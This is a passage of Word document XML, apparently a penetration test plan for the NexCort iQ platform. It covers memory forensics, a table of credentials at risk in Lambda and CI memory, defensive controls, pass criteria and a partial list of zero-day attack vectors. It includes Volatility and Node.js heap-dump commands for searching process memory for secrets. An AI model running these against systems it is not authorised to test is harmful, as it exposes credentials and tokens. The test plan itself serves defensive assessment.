          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 vol.py -f /tmp/memory.lime linux.envars      # environment variables</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 vol.py -f /tmp/memory.lime linux.psaux       # running processes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D3A50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Node.js Heap Inspection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Generate heap snapshot from a running Node.js process</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">kill -USR2 $(pgrep node)   # triggers heapdump if node-heapdump installed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Or use --inspect flag and Chrome DevTools Memory profiler</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">node --inspect apps/api/src/index.js</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Connect chrome://inspect → Memory → Take heap snapshot → search for secrets</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">NexCort iQ Specific Memory Risks</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80"/>
        <w:gridCol w:w="2160"/>
        <w:gridCol w:w="5040"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="2D2A40" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E4DFF5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="2D2A40" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E4DFF5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Where</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5040"/>
            <w:shd w:fill="2D2A40" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E4DFF5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Finding</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">RING_CREDENTIALS_SECRET_ARN contents</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Lambda execution memory</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5040"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Ring client_id/client_secret cached after Secrets Manager call</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="288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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Cognito admin credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="216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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">CI/CD runner memory</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="504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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">aws-vault or SSO session tokens</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Agency JWT tokens</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">API Lambda memory</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5040"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Full JWT tokens if logged or cached in module scope</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="288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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">DynamoDB query results</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="216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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Lambda execution memory</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="504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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Bulk agency data if queries are not properly scoped</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">CAP auth tokens</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">CAP ingest Lambda</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5040"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">X-RC-Cap-Token header value in request object</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Defensive Controls to Verify</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Secrets Manager values retrieved per-invocation, not cached in Lambda module scope</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Lambda event objects (which may contain auth headers) are never logged</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Node.js process on dev machines runs in a sandboxed environment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CI/CD runners are ephemeral — no persistent credential storage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">aws-vault is used with short-lived STS tokens (max 1 hour), not long-lived keys</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Pass Criteria</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">No long-lived AWS credentials found in process memory on developer workstations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Ring client credentials not recoverable from Lambda execution memory</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">No JWT tokens appear in CloudWatch log streams</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">STS temporary credential expiry verified at 1 hour maximum</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="7C3AED" w:sz="4" w:space="6"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 7 — Zero-Day Discovery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Zero-day discovery focuses on finding previously unknown vulnerabilities — flaws with no public CVE, no existing exploit, and no vendor patch. This is the highest-skill area of offensive security and typically yields the most critical findings.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">High-Value Target Areas in NexCort iQ</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60"/>
        <w:gridCol w:w="2520"/>
        <w:gridCol w:w="5400"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="2D2A40" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E4DFF5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Target</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2520"/>
            <w:shd w:fill="2D2A40" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E4DFF5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Why High Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5400"/>
            <w:shd w:fill="2D2A40" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E4DFF5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Attack Vector</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">CAP XML parser (cap-parser.ts)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2520"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Custom parser — classic source of injection and DoS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5400"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Malformed XML, CDATA injection, entity expansion</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="216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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">JWT authorizer edge cases</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="252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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Custom auth logic may have gaps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="54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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Malformed headers, boundary conditions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">CAD write-back approval race condition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2520"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Multi-step workflow with concurrent users</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5400"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Parallel requests at approval boundary</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="216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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Ring OAuth state collision</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="252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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Two users from same agency at same second</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="54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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Concurrent auth requests</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">QR code ULID predictability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2520"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">If IDs are predictable, scanning yields neighbor codes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5400"/>
            <w:shd w:fill="F8F7FE"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18"/>
